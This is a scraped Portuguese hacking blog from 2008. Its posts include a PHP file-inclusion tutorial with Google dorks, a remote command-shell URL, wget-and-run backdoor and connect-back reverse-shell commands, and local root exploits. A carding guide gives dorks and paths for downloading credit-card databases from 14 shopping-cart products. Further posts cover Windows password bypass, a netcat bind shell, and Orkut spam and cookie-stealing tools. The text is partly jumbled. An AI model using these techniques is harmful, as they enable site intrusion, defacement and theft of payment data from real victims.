0000000 bruno-tk — 31-03-2008 GTM 11 @ 03:26
Ver/Escrever Comentários (1) | 
Do Melhor 
Linkk | 
del.icio.us
Ver/Escrever Comentários (1) | Do Melhor Linkk | del.icio.us
1) Introdução
Já que muita gente pede ajuda sobre php injection, resolvi fazer
um tutorial de simples entendimento pra facilitar a vida da galera new.
Esta falha consiste em usuários incluirem scripts no codigo php da
vitima e este ser executado. Quando corretamente utilizado, que é o que
explicarei nesse tutorial, o intruso pode setar comandos ao servidor.
Boa parte do processo pode ser feito pelo próprio browser (IE,
mozilla, netscape...).
Tentarei explicar como procura, explora e corrige o bug. Espero
ser util para todos ;)
Obs1.: Este tutorial foi feito para explicar uma das maneiras utilizadas
por pessoas para desfigurar sites mas pode ser utlizado para outros fins.
Vai da cabeça de cada um :P
Obs2.: No final, terão urls com os programas citados.
2) O que é o que
Vitima : Site que você irá explorar a falha de php.
String : Arquivos no site suceptiveis ao ataque.
Cmd : Script em PHP que nos possibilita digitar
comandos a serem incluidos no php.
Backdoor : Abre portas no sistema para conexão remota 'sem
autenticação'.
Connect Back : Abre uma porta especifica para conexao entre seu
pc e a vitima.
Exploit : Programa que explora certa falha num sistema.
Há vários tipos de Exploits. Aqui, iremos
tratar apenas com Local Root Exploits. (exploram
falhas localmente que levam usuários comuns a
acesso root - super-usuário -)
Shell : É um programa interpretador de comandos que
permite ao usuário iteragir com o sistema
operacional através de comandos digitados.
Telnet : Utilizaremos para conexões remotas.
Firewall : É uma barreira inteligente entre uma rede local
e a Internet, através da qual só passa tráfego
autorizado. Este tráfego é examinado pelo
firewall em tempo real e a seleção é feita de
acordo com a regra."o que não foi expressamente
permitido, é proibido"
root : Super-usuário. É o admin... tem acesso total ao
sistema.
------------------- No browser
3) Strings
Há várias strings disponíveis. Neste tutorial, irei utilizar para
exemplos uma bem simples que é " index.php?page= ". Em anexo, no final,
várias outras :P
4) Sintaxe
Ex.:
www.site.com /arquivo.php?data= http://cmd/cmd.gif?&cmd= ls
^ ^ ^ ^
Vitima String CmD comando unix
P.S.: Sem os espaços.
5) Procurando site vulnerável.
Uma excelente ferramente para os kiddies, sem dúvida, é o google.
Há várias maneiras de fazer buscas por ele, dentre elas:
Obs.: A palavra 'word' q irei citar aqui é qualquer coisa que você esteja
procurando no sistema de busca.
word : Busca por sites q contenham a 'word' em qualquer
lugar da pagina.
allinurl: : Sites que contenham na url a word citada. Ex:
www.site.com/forum/word.php?id=0 .
allintitle: : Restringe sua pesquisa ao título da página.
intitle: : Parecido com o de cima, para maiores
esclarecimentos no final do tuto.
inanchor: : Busca nos links dentro co corpo dos sites. href="PROCURA AQUI DENTRO"> site: : Procura sites de um determinado domínio. Ex: site:br <- procura sites .br link: : Sites que contenham links para um outro determinado site. Ex: link:www.securityfocus.com filetype: : Filtra por extensões de arquivos. Ex: filetype:php <- procura apenas urls .php Essas dicas devem ser uteis não apenas na busca de sites vulneraveis, mas também nas buscas comuns para você ;) Utilizando a string "index.php?page=" para sites .gov --> allinurl:index.php?page= site:gov Fácil.. . Você também pode usar um scanner pra tornar o processo mais eficiente. kieger (membro do r00t_System grouP) codou um em perl: Procura com o sistema do google, testa e imprime os vulneraveis num arquivo. Código no final do tutorial. 6) Utilizando a CmD 6.1) Incluindo Cmd = http://rootsystem.100free.com/cmd/cse.gif?&cmd= (coded by Crash from datacha0s group.) No resultado, insira a cmd na string. Ex: www.site.com/index.php?page=http://rootsystem.100free.com/cmd/cs e.gif?&cmd= Não tem mistério. 6.2) A Cmd datacha0s - PHP Command/Safemode Exploit System Information sysname: --> Sistema operacional rodando. nodename: --> Nome local. release: --> Versão do kernel. Script Current User: --> Usuário pelo qual o script está sendo executado. PHP Version: --> Versão do php da máquina User Info: --> Informação do user (uid, euid, gid). Current Path: --> Pasta atual que você está no server. Server IP: --> Ip do servidor. Web Server: --> Informações sobre o servidor. [*] Command Mode Run Command Stdout (( aqui ficarao os resultados dos comandos )) (( inseridos na cmd )) Obs.: O script varia de cmd a cmd. Este é apenas um exemplo. 7) Ganhando acesso a shell Para os próximos passos, você precisa estar na shell (interpretador de comandos) da máquina. Para isto, explicarei duas maneiras de tornar isto possível: Backdoor e Connect Back. 7.1) Rodando backdoor no server para conexão remota Para rodar um backdoor, basta fazer um upload, escolher permissões, e executá-lo. Comando: cd /var/tmp;wget www.site.onde.está.o.backdoor.com/backd oor;chmod 777 backdoor;./backdoor cd /var/tmp -> Faz a operação nesta pasta, por ser comum a todos os usuários e devido às suas permissões. /tmp tb serve :) wget www.(...)/backdoor -> Copia o backdoor a partir de uma url para o site. Quando wget não funcionar, tente outros comandos. Sintaxes: wget www.site.com/arquivo lynx -source www.site.com/arquivo > arquivo curl -o arquivo www.site.com/arquivo GET www.site.com/arquivo > arquivo (...) Após feito isso, aparecerá a seguinte mensagem: Daemon Working... pid = XXXXX Isto significa que o backdoor está rodando. Agora, basta conectar-se à shell. Como? No Win: Iniciar -> Executar -> telnet www.site.com porta Onde o www.site.com recebe o nome ou ip do site que você rodou o backdoor e porta é a porta que o backdoor está trabalhando. Se aparecer no telnet bash-2.05b$ ou algo parecido, é porque funcionou! E você tem acesso à shell na máquina! Se demorar um tempo e não cair na shell, confira o nome/ip do server.. se estiver correto, ele está rodando Firewall. E agora? simples, Connect Back. :P 7.2) Connect Back Método muito eficiente para ganhar shell numa máquina. Ganha shell reversamente. Windows: Baixe o netcat para windows e no Prompt do MSDOS (na pasta que o nc se encontra), digite: nc -vv -l -p 15 , onde 15 pode ser escolhido de acordo com sua preferência. Esta porta será a que realizará a conexão. Agora, voltando para o browser, na cmd digite o seguinte comando: cd /var/tmp;wget www.site.do.dc.com/dc;chmod 777 dc;./dc IP porta cd /var/tmp -> Mesmo que para backdoor. wget www.site.do.dc.com/dc -> | | | | , mas é logico, com o endereço da dc. ./dc IP porta -> onde IP é o SEU IP e porta é a porta que você escolheu no netcat. Feito isso, se ocorrer tudo certo, aparecerá como resultado: Connect Back Backdoor [*] Dumping Arguments [*] Resolving Host Name [*] Connecting... [*] Spawning Shell [*] Detached Isto significa que você se conectou na shell! ;) Agora, vá para o MSDOS e vamos para o próximo passo. Se aparecer Connect Back Backdoor [*] Dumping Arguments [*] Resolving Host Name [*] Connecting... [-] Unable to Connect confira os dados (seu ip, porta, netcat, etc). Se insistir, sua rede não aceita este tipo de conexão. Tente outras portas (como 80, 22, 15, etc). ---------------------------------- Na Shelll 8) Comandos básicos Eu ia passar direto nessa parte, mas sei que muitos não conhecem os comandos unix. Então vamos conhecer alguns: ls -> Lista arquivos. Pode ser combinado com -a (mostra ocultos) e -l (mostra detalhadamente). Ex: ls -la (mostra detalhadamente os arquivos, inclusive ocultos). uname -a -> Mostra informações do sistema, como versão do kernel, nome, e outras coisas uteis. id -> Mostra sua id. os arquivos setados, inclusive pastas mkdir -> Cria diretorio Salvando resultados em arquivos comando > /arquivo/onde/será/armazenado Ex: ls /etc > /tmp/s.txt salva todo o resultado da listagem de /etc no arquivo /tmp/s.txt Adicionando linhas em arquivos echo ' linha ' >> /arquivo/onde/será/incluido Descompactando arquivos (os mais comuns) .tar -> tar xvf arquivo.tar Compactando arquivos (os mais comuns) .tar -> tar cvf destino.tar ARQUIVO 9) Ganhando acesso root Para ganhar acesso root localmente numa máquina, vai depender muito. Você precisa de um exploit local e o sistema deve estar vulnerável. Simples, basta baixar, escolher as permissões e executar.. assim como você faz com o backdoor.. mas isto você faz na shell. Os mais comuns no momento são mremap , brk e kmod para kernel abaixo de 2.4.24 Se tudo ocorrer corretamente rootando a máquina, ao digitar o comando "id" você verá bash-2.05b# id uid=0(root) gid=0(root) Pronto! Você é root! Divirta-se ;)
Ver/Escrever Comentários (1) |
w -> Lista os usuários logados no momento.
cp -> Copia arquivos. Sintaxe: cp arquivo /destino/
mv -> Move arquivos. Sintexe: mv arquivo /destino/
rm -> Remove arquivos. Se combinado com -rf , remove todos
rmdir -> Exclui diretorio
find -> Procura por arquivos/pastas. Ex: " find /etc -name
httpd.conf " procura pelo httpd.conf na pasta /etc
pwd -> Mostra em que pasta você está localizado
cat -> Exibe o conteúdo de um arquivo na tela
head -> Exibe linhas do início do arquivo
tail -> || || || final do arquivo
ctrl+c -> Sai/killa um programa
ctrl+r -> Busca comando digitado no history do bash
ps -auxw -> Lista todos os processos do sistema
netstat -na -> Status da conexão
kill -9 -> Mata processo. Sintaxe: kill -9 PID DO PROCESSO
kill -HUP -> Reinicia processo. Sintaxe: kill -HUP ID DO PROCESSO
pico -> Editor de texto. Sintaxe: pico arquivo
vi -> | | vi arquivo
.tar.gz -> tar zxvf arquivo.tar.gz
.tar.bz2 -> tar jxvf arquivo.tar.bz2
.zip -> unzip arquivo.zip
.tar.gz -> tar cvf destino.tar ARQUIVO | gzip destino.tar
.tar.bz2 -> tar cvf destino.tar ARQUIVO | bzip2 destino.tar Do Melhor Linkk | del.icio.us
Existem varias maneiras, mas vou ensinar a que acho como a mais simples, sem nenhum programa, mas se quiser vc pode baixar o programa "passwinxp.exe" ou o "XPADM.exe", mas como ja falei e mais dificl porque tera que criar um disco de boot e depois iniciar pelo boot, mas vamos as 2 maneiras mais faceis.
- A Primeira maneira de se fazer isto, é a seguinte:
Quando ligar o computador fique apertando F8 ate aparecer a tela onde tera as opcoes de inicializacao, escolha como modo seguro, entao vai aparecer a conta do administrador ou ira entrar direto nela, agora e so ir no painel de controle e desativar a senha da conta bloqueada, MASSSS existe um porem, se a conta do administrador tambem estiver bloqueada nao vai ter jeito pq ele vai pedir a senha. Ai se todas contas disponiveis estiverem com senha e vc nao souber nenhuma delas vai ter que ser pelos programas listados, mas se souber uma das senhas ha outro jeito que e a 2ª maneira.
- A Segunda maneira de se fazer isto, é a seguinte:
Entre em qualquer conta, va em iniciar/ executar e digite "control userpasswords2" logo ira aparecer uma telinha onde vc pode deletar e mudar a senha de todas as contas existentes.
Ver/Escrever Comentários (5) | Do Melhor Linkk | del.icio.us
NESTE TUTORIAL IREI MOSTRAR QUASE TODAS AS FORMAS POSSÍVEIS DE SE CONSEGUIR CARTÕES DE CRÉDITOS, NA INTERNET.
ESTE TEXTO É VOLTADO SOMENTE PARA APRENDIZADO, NÃO ME RESPONSABILIZO PELO USO INDEVIDO DO MESMO.
TODOS DIZEM QUE CARDING É UMA TAREFA DIFÍCEL, QUE PARA SER REALIZADA, O ATACANTE NECESSITA DE UM GRANDE CONHECIMENTO TÉCNICO.
FOI JUSTAMENTE POR ISSO QUE RESOLVI ESCREVER ESSE TUTO, DE UMA FORMA CLARA E OBJETIVA, SEM MUITA TEORIA, POIS DEVE SER ISSO QUE ESTÁ ATRAPALHANDO VOCÊS.
[Indíce]
[1] Bug AspCart5
[2] Bug CandyPress
[3] Bug Cart Hassan
[4] Bug Cart32
[5] Bug ccbill
[6] Bug Cyber office
[7] Bug Ezshopper 2.0 & 3.0
[8] Bug Fpdb
[9] Bug MidiCart
[10] Bug Perlshop.cgi
[11] Bug ProductCart
[12] Bug Quikstore
[13] Bug SoftCard
[14] BugWebStore
-----------------
[1] AspCart5[*]
-----------------
Bem aki estou outra vez, apanhar uma grande seca a escrever um tutorial, mas enfim é por uma boa causa. Então vamos la, mais conhecimento ai para o pessoal que quer se iniciar no carding..
Primeiro vc só tem de ir ao google e digitar:
allinurl:/backend/ no qual vão aparecer uma lista de sites.
Depois é só mudar a url:
Exemplo:
www.fhp.pt/backend/xxx.asp ---> URL Normal
www.fhp.pt/aspcart5.mdb ---> URL Modificada
Bem como viram é uma maneira muito fácil mas eficaz...
------------------
[2] CandyPress[*]
------------------
Primeiramente va até ao google e digite: allinurl:/candypress/ e ira aparecer os possiveis sites com bugs:
Exemplo:
www.fhp.pt/candypress/xxx/xxx.asp
Se aparecer uns sites parecidos com isto e so mudar assim como os exemplos abaixo:
www.fhp.pt/store.mdb
www.fhp.pt/storefront.mdb
www.fhp.pt/fpdb/storefront.mdb
www.fhp.pt/fpdb/store.mdb
Agora se aparecer uns sites tipo isto:
www.fhp.pt/xxx/candypress/xxx.asp
E so mudar a url como os exemplos abaixo:
www.fhp.pt/xxx/store.mdb
www.fhp.pt/xxx/storefront.mdb
www.fhp.pt/xxx/fpdb/storefront.mdb
www.fhp.pt/xxx/fpdb/store.mdb
[3] Cart Hassan[*]
-------------------
Esta falha permite vc ver o lugar onde estão os cc.
Primeiramente va ao google e digite allinurl:Shop.pl/page=
Agore vc só tem de trocar o que vier depois page= por shop.cfg isto parace um bocado confuso mas olhe para o exemplo:
www.fhp.pt/shop.pl/page=shop.cfg acho que ja percebeu, entao que tenha uma boa caça
---------------
[4] Cart32[*]
---------------
Primeiramente va ate ao google e digite allinurl:cart32.exe e serão exibidos uma lista de sites.
Depois é só mudar as urls como se segue nos exemplos baixo:
Exemplo:www.fhp.pt/cgi-bin/cart32/cart32page-orders.txt
www.fhp.pt/cgi-bin/cart32.ini
www.fhp.pt/cgi-bin/cart32/cart32page-output.txt
www.fhp.pt/cgi-bin/cart32.exe/cart32clientlist
www.fhp.pt/cgi-bin/cart32.exe/error
www.fhp.pt/scripts/cart32/cart32page-orders.txt
www.fhp.pt/scripts/cart32/cart32page-output.txt
www.fhp.pt/scripts/cart32.ini
www.fhp.pt/scripts/cart32.exe/error
www.fhp.pt/scripts/cart32.exe/cart32clientlist
---------------
[5] ccbill[*]
---------------
Primeiro tens de ir ao google e digitar allinurl:/ccbill/ e aparecera uma lista de sites, nos quais vc so tera de modificar a url como o meu exemplo.
exemplo:
www.fhp.pt/ccbill/
www.fhp.pt/ccbill/secure.order.log
www.fhp.pt/ccbill.log
www.fhp.pt/ccbill/secure/currenty.log
www.fhp.pt/currenty.log
--------------------
[6] Cyber office[*]
--------------------
Este bug permite vc fazer o download da database
Para isso tem de ir ao google e digitar allinurl:/shopping_cart/view_cart.asp
A database fica no directorio /_private/ e chama se Shopping_cart.mdb.
Por isso o site ficava assim www.fhp.pt/_private/Shopping_cart.mdb
Vc tb pode procurar no google por allinurl:/shopping_cart/
[7] Ezshopper 2.0 & 3.0[*]
---------------------------
Primeiramente va ao google e digite allinurl:loadpage.cgi.
Agora e so substituir as urls dos sites que apareceram como demonstra o exemplo em baixo referido:
Exemplo:
Ezshopper v2.0
www.fhp.pt/cgi-bin/ezshopper2/loadpage.cgi?id+/ URL Normal
http://www.fhp.pt/cgi-bin/ezshopper2...subdirectorio/ URL MUDADA
http://www.fhp.pt/cgi-bin/ezshopper3...r_id=id&file=/ UrL Normal
http://www.fhp.pt/cgi-bin/ezshopper3...subdirectorio/ URL MUdADA
------------
[8] Fpdb[*]
------------
Primeiramente va ate ao google e digite allinurl:mall/lobby.htm
Vc ira encontrar urls como estes exemplos:
Exemplo:
www.fhp.pt/mall/lobby.htm
www.fhp.pt/shoponline/mall/lobby.htm
Exemplo de como ficam as urls modificadas:
www.fhp.pt/fpdb/shop.mdb
www.fhp.pt/shoponline/fpdb.mdb
----------------
[9] MidiCart[*]
----------------
Para variar vamos ao google e digite allinurl: meny2.asp e vai aparecer uma lista de sites.
Agora e so mudar a urls..
Exemplo:
www.fhp.pt/meny2.asp
www.fhp.pt/midicart.mdb
www.fhp.pt/shop/meny2.asp
www.fhp.pt/shop/midicart.mdb
---------------------
[10] Perlshop.cgi[*]
---------------------
Primeiramente va ao google e digite allinurl:Perlshop.cgi
O que vc ta procurando são estes directorios:
/temp_customers/
/temp_orders/
/orders/
Exemplo:
www.fhp.pt/cgi-bin/perlshop/temp_orders/
www.fhp.pt/cgi-bin/perlshop/temp_customers/
Isto pode lhe fornecer informa?oes interessante do site...
--------------------
[11] ProductCart[*]
--------------------
Vou agora falar de um bug um pouco conhecido que é o productcart.
As versões bugadas são a 1.0 e 2.0
Na instalação de default,o arquivo de dados do carrinho de produto e localizado em /productcart/database/Eipc.mdb
Que pode ser acessado facilmente por qualquer ataque remoto.
Exemplo:
www.fhp.pt/productcart/database/EIPC.mdb
Pronto é tudo que vc pode obter acesso ao banco de dados
------------------
[12] Quikstore[*]
------------------
Primeiramente e so ir ao google ( para variar ) e pesquise allinurl:quikstore.cgi
Agora é so mudar os "sites" por estas urls como amostra nos exemplos:
www.fhp.pt/cgi-bin/log_files/access.log
www.fhp.pt/cgi-bin/log_files/error.log
www.fhp.pt/cgi-bin/orders/
www.fhp.pt/cgi-bin/orders/1001.1.log
www.fhp.pt/cgi-bin/database/
www.fhp.pt/cgi-bin/cb/
www.fhp.pt/cgi-bin/
http://www.fhp.pt/cgi-bin/quikstore.....html&cart_id=
http://www.fhp.pt/cgi-bin/quikstore....0html&cart_id=
http://www.fhp.pt/cgi-bin/quikstore....0html&cart_id=
http://www.fhp.pt/cgi-bin/quikstore....ohtml&cart_id=
-----------------
[13] Softcard[*]
-----------------
Primeiramente vai ate ao google e digite allinurl:softcart.exe
O que aparecerá são mts sites e vc so tem de procurar urls como este pequeno exemplo:
Exemplo:
www.fhp.pt/cgi-bin/orders/*.olf
www.fhp.pt/cgi-bin/pw/storemgr.pw
-----------------
[14] WebStore[*]
-----------------
Bem primeiramente vai ate ao google e digita allinurl:web_store.cgi e aparecera uma lista de sites:
Nas quais somente vc ira mudar a url como no exemplo abaixo referido.
Exemplo:
www.fhp.pt/admin_files/order.log
É isso ai
Ver/Escrever Comentários (4) | Do Melhor Linkk | del.icio.us
NETCAT -L -p 23 -e c:\command.com
NETCAT -vv -r 127.0.0.1 100-110
Se vc observar atentamente, vai ver que NetCat escanea agora as portas
completamente ao acaso no intervalo 100 a 110. Isso é muito interessante,
não é? De fato, muitos sistemas de proteção de scan são baseados numa
detecção de escaneamento de portas consecutivas.
Eldarion.
Ver/Escrever Comentários (1) | Do Melhor Linkk | del.icio.us
All About Orkut 1.0 - (Flooda vídeos e depoimentos)
Chameleon – (Criptografa e descriptografa HEX e Base64)
Cyber Eraser – (Apaga recadoss)
Cyber Flood Depoimentos – (Flooda depoimentos)
Cyber Flood Scraps – (Flooda Scraps)
Cyber Make Fake – (Cria profiles em massa)
Cookie Monster – (Captura cookies,vai com tutorial juntoe)
Envie Alegria – (Envia scraps para todos seus amigos)
Find Uid – (Captura Uids)
Floodmachine – (Melhor programa para floodar scraps)
Formatador Orkut – (Formata seus scraps)
Free Orkut Toolbar – (Barra de ferramentas multi-função)
Google Talk – (Mensageiro instantâneo do Orkut)
Jim's Fake Tools - (Crie fakes em massa e possui a função de ressucitalo se o Orkut deletar)
Loginkut – (Loga automaticamente em seu perfil com tempo determinando para se manter sempre no topo)
Lost Soul Flooder – (Flooda scraps)
Make Fake 1.0 – (Cria profiles em massa)
Make Fake 1.5 – (Cria profiles em massa)
Mass add Temporario– (Add pessoas de determinadas comunidades em massa)
Mass Add - (Add pessoas de determinadas comunidades em massa - versão atualizada)
Mass Flood Depoimentos – (Flooda depoimentos)
Mass Flood Scraps 1.0 – (Flooda scraps)
Mass Flood Scraps 1.5 – (Flooda scraps
Meetul Profile Maker – (Cria profiles em massa)
No Spam – (Bloqueia scraps spam no Orkut)
Orkut detetetive – (Gerenciador de profiles)
Orkut Clear Testimonial – (Apaga depoimentos)
Orkut Community Manager – (Gerenciador de comunidades)
Orkut Flooding – (Flooda scraps,depoimentos e vídeos)
Orkut Plus – (Gerenciador de profiles)
Orkut Spam Tools – (Flooda comunidades)
Orkut Mailer – (Envia Scraps ou depoimentos para todos seus amigos)
Orkut Cute – (Envia scraps para todos seus amigos)
Pending Members – (Aceita os membros pendentes em suas comunidades)
Popeye’s Super Flooder Beta 2.0 – (Flooda scraps e depoimentos)
Popeye’s Super Flooder Beta 3.0 – (Flooda scraps e depoimentos)
Profile Counter – (Gerenciador de profiles)
Sar Profile Maker – (Cria profiles em massa)
Scrapboy – (Transforme o Orkut em um mensageiro instantâneo)
Sony Clean Testimonial – (Apaga depoimentos)
Sony Friends Orkut 1.5 – (Envia scraps e depoimentos para todos seus amigos)
Sony Friends Orkut 1.6 – (Envia scraps e depoimentos para todos seus amigos)
Sony Friends Orkut 2.3.0.0 - (Envia scraps e depoimentos para todos versão atualizada)
Sony Flood Scrap – (Flooda scraps)
Scraps Profile Community – (Envia scraps para todos de uma cmm)
Scrap Sender – (Envia scraps para todos seus amigos)
Toc Toc – (Envia scraps para todos seus amigos)
Torkutter – (Gerenciador de Profiles)
Upador de Profiles – (Upa seus profiles)
Ver/Escrever Comentários (12) | Do Melhor Linkk | del.icio.us
Mais de 500 programas difíceis de serem encontrados utilizados por especialistas em segurança digital para identificar e explorar falhas em sistemas digitais! Indispensável se você é profissional da área de redes e quer estudar mais sobre segurança!
-
Este CD contém todos os programas que especialistas em segurança digital precisam para avaliar o nível de segurança de sistemas digitais e explorar brechas em busca de vulnerabilidades, antes que um hacker explore essas brechas para invadir o sistema.
-
O CD traz programas, aplicativos e exploradores de vulnerabilidades para as seguintes plataformas: Windows 95, Windows 98, Windows 2000, Windows NT, Windows XP, AIX, Solaris, FreeBSD, OpenBSD, Linux, MacOS, Novell, IRIX e PalmOS. E ainda farta documentação técnica sobre segurança digital (em inglês) e todas as palestras da conferência BlackHat, a maior conferência hacker do mundo (em inglês)!!!
-
Estilo: Ferramentas pra Técnicos de Informática
Fabricante: Clube do Hardware
Sistema Operacional : Windows all
Ano de Lançamento: 2007
Formato: Iso
Idioma: Português
Tamanho: 457 Mb
1 http://rapidshare.com/files/13911984/kit.01.part01.by.riskblack.rar
2 http://rapidshare.com/files/13636729/kit.01.part02.by.riskblack.rar
3 http://rapidshare.com/files/13612665/kit.01.part03.by.riskblack.rar
4 http://rapidshare.com/files/13609353/kit.01.part04.by.riskblack.rar
5 http://rapidshare.com/files/13606362/kit.01.by.riskblack.part05.rar
6 http://rapidshare.com/files/13603617/kit.01.part06.by.riskblack.rar
7 http://rapidshare.com/files/13525250/kit.01.part07.by.riskblack.rar
8 http://rapidshare.com/files/13509817/kit.01.part08.by.riskblack.rar
9 http://rapidshare.com/files/13501771/kit.01.part09.by.riskblack.rar
10 http://rapidshare.com/files/13483653/kit.01.part10.by.riskblack.rar
Ver/Escrever Comentários (12) | Do Melhor Linkk | del.icio.us
Playstation 1:
http://adripsx.psxemu.com/download/adripsx-dos-010201.zip/
Playstation 2:
http://nsx2.emulation64.com/files/downloads/nsx2-0.08.1-win32.zip/
Snes:
http://www.lezin.pop.com.br/centraldownloads/Zsnes1.36.exe/
Nintendo 64:
http://www.smiff.clara.net/emulators/pj64/pj64_1_5.exe/
Game boy Color:
http://prdownloads.sourceforge.net/vba/VisualBoyAdvance-1.7.2.zip/
Game boy Advance:
http://prdownloads.sourceforge.net/vba/VisualBoyAdvance-1.7.2.zip/
Mega Drive:
http://baixaki.ig.com.br/site/dwnld4559.htm/
Saturno:
http://rapidshare.com/files/25176881/yabause-0.8.0-win.zip/
Game Gear:
http://n64-gba-snes-roms-rox.discovirtual.uol.com.br/disco_virtual/roxdownload/dl/Fusion.rar/
Game Cube:
http://www.dolphin-emu.com/downloads/r4-dolphin-1.02/Dolphin_v102.zip/
Dolphin:
http://www.dolphin-emu.com/downloads/r4-dolphin-1.02/Dolphin_v102.zip/
Ver/Escrever Comentários (1) | Do Melhor Linkk | del.icio.us
Dawnload :
http://rapidshare.com/files/46260725/Install_programa.rar
Video aula :
http://rapidshare.com/files/46261620/Video_Aula.rar
Imagens :
http://rapidshare.com/files/46272964/Imagen_do_MSN_hacker.rar
Ver/Escrever Comentários (14) | Do Melhor Linkk | del.icio.us
Muitas pessoas me perguntam como invadir um site ou como pixar um. Então, pensando nisso darei início a mais uma série em um tutorial que farei para descobrir os pequenos segredos da web, mas aconselho depois dessa leitura, vc se aprofundar em aprender mais com outras pessoas, ler livros sobre o assunto ou mesmo entrar em um curso de Web Design. Pois vale a pena e ganha um bom dinheiro também. Espero que gostem desse simplificado mini-tutorial, assim como gostaram dos anteriores... Serei redundante em dizer que é apenas o básico para seu aprendizado, vc terá que correr atrás de mais conheçimentos com o passar dos tempos e da sua evolução. WWW World Wide Web, ou traduzindo, "TEIA MUNDIAL E INFORMAÇÕES". Esse conceito é dado devido a forma com que a Internet funciona, pois é uma ligaçao de milhares de computadores, servidores e servidores proxy, conectados como se fossem uma teia de aranha. Onde cada ponto pode se conectar com outro se tiver a comunicação e "enderessagem" correta. Diferença entre Web Designer e Web Master Uma pessoa pode atuar em uma das áreas ou nas duas juntas, dependendo da necessidade e de seu conheçimento. Um Web designer pode muito bem ser um Web Master, mas nem todos Web Master são Web Designer devido algumas limitações que o impede de criar e projetar sites. Para quem está começando agora a criar suas próprias páginas de Internet, é preciso escolhe qual caminho terá que se especializar. Existe duas maneira pra vc começar a desenvolver sua página em Html, a primeira é sua um programa no estilo "WYSIWYG", ou criar através de um Bloco de Notas que vem em qualquer Windows. É notório dizer, que cada pessoa que saiba trabalhar com uma ou outra técnica precisará aprender a outra pois lhe faltará teoria se trabalhar com uma só. Enfatizarei o aprendizagem com a técnica de criação através de um Bloco de Notas Pois todos têm em seu computador e é o sistema menos utilizado por ser razoávelmente mais díficil aprender. Mas se vc não conheçe pelo menos o básico em código fonte, nunca será um bom profissional ou invasor. Vamos ver um exemplo de Código Fonte: Vc obviamente está na página do orkut neste momento... acertei? rsrs Então na barra de menu lá em cima, clique no menu Exibir, depois clique na opção Código Fonte Abrirá em seu bloco de notas com vários códigos em tags, e tente ler linha por linha palavra por palavra esse código até o final para que vc vá se familiarizando com esse código. Browser Browser nada mais é do que o programa que vc está usando agora para abrir este site do orkut ou outro qualquer. Internet Explorer (da Microsoft) Mozilla FireFox e Opera. Não, na verdade equivoca-se quem diz que sabe programar em HTML, na verdade esta pessoa deve saber descrever em HTML pois as tags não são capazes de promover uma simples conta de 2 + 2 em seu browser. Já programas são capazes de desenvolver ações lógicas em seu PC. O mais conheçido programa para web é o Java Script I e Java Script II , mas existem outros como PHP e ASP que têm suas aplicações exatas para cada tipo de sistema. Então, vc vai aprender a programar em HTML? rsrs Um dos fatores que poucos levam em consideração é a idéia a ser posta em prática, porém essa deveria ser sua primeira preocupação depois que tiver certo domínio da parte técnica. Se alguém escreve algum livro, escreve pra que outro(s) leia(m), do mesmo modo que se vc for fazer um site, faça para que pessoas possam se interessar por esse assunto, ou então, seu site entrará nas estatísticas de sites sem visitação (sites chatos mesmo). E antes que começamos a por em prática algumas teorias, reflita sobre o assunto e lembre-se de quantos sites vc já entrou e se arrependeu ou que entrou uma vez só e nunca mais voltou. Agora eu pergunto: "A culpa foi sua de não voltar ou o site que não era atrativo?". Pense nisso! Básicamente vc irá precisar de apenas um Bloco de Notas, mas com o tempo precisará também de algum programa WINSYNG para desenvolver páginas no seu auxílio, esse programas winsyngs são basicamente como um editor de texto Microsoft Word, porém sua aplicação é no desenvolver páginas web. O mais conheçido programa Winsyng atualmente é DREAMWEAVER. Mas esse assunto trataremos depois dos códigos em tags HTML. Vale apenas ressaltar que programas editores de texto como Microsoft Word e WordPAd, geram seu próprio código no momento de salvar, e isso poderá lhe trazer complicações ou efeitos indesejáveis. Vamos fazer uma página web simplificadíssima, e depois vamos analisar passo-à-passo em seguida. Abra seu Bloco de Notas. (No Windows: INICIAR/PROGRAMAS/ACESSÓRIOS/BLOCO DE NOTAS. Cole a descrição que postarei abaixo, mas sem nenhuma alteração de momento. Parabéns, esta é sua primeira página feito na "unha" Este é um pequeno passo Mas que já é um grande avanço!!!. Logo logo estará melhor que muitos Web Design por aí...rsrs Bruno TK - TK
Conceito
Mas como vc pode fazer tal "Obra" se vc não conheçe a estrutura de um site? Difícil né?
Alguns termos técnicos
Os profissionais que desenvolvem e criam páginas web (sites) são chamados de "Web Designer"
Os profissionais que fazem a manutenção e alteração nesta página é chamado de "Web Master".
Qual Caminho percorrer?
O que é Código Fonte?
Código fonte é a descrição que seu Browser (Internet Explorer por exemplo) entende, ou seja, esta descrição dirá ao seu computador aonde e em que tamanho virá o arquivo, script ou foto a ser baixado para a página, e o que deverá aparecer nela.
O que é HTML?
HTML é uma linguagem de descrição que foi desenvolvida para ser um linguagem universal entre os navegadores da internet. Essa linguagem teóricamente permite que todos os Browser possam ler corretamente.
Existe vários Browser no mercado, mas os mais conheçidos são :
HTML é uma linguagem de programação?
Colocando a idéia em prática
Chega de teorias, vamos a prática!
Sua primeira página Web
Ver/Escrever Comentários (4) | Do Melhor Linkk | del.icio.us
Tags